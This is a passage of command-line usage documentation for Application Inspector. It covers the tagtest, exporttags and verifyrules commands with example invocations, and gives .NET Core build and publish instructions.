-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: true) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low
-l, --log-file-path Log file path
-v, --log-file-level Log file level

Simplest use to see if a set of rules are all present in a project
  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json

Basic use
  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulespresent

Basic use
  dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulesnotpresent

ExportTags Command
Simple export of the ruleset schema for tags representing what features are supported for detection
  Usage: dotnet AppInspector.dll exporttags [arguments] [options]

Arguments:
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low

Export default rule tags to console
  dotnet AppInspector.dll exporttags

Using output file
  dotnet AppInspector.dll exporttags -o /home/user/myproject/exportags.txt

With custom rules and output file
  dotnet AppInspector.dll exporttags -r /home/user/myproject/customrules -o /hom/user/myproject/exportags.txt

Verify Command
Verification that ruleset is compatible and error free for import and analysis
  Usage: dotnet AppInspector.dll verifyrules [arguments]

Arguments:
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low

Simplest case to verify default rules
  dotnet AppInspector.dll verifyrules

Using custom rules only
  dotnet AppInspector.dll verifyrules -r /home/user/myproject/customrules -i

Build Instructions
Building from source requires .NET Core 3.0. Standard dotnet build commands can be run from the root source folder.

Framework Dependent
  dotnet build -c Release

Platform Targeted Portable
  dotnet publish -c Release -r win-x86
dotnet publish -c Release -r linux-x64
dotnet publish -c Release -r osx-x64

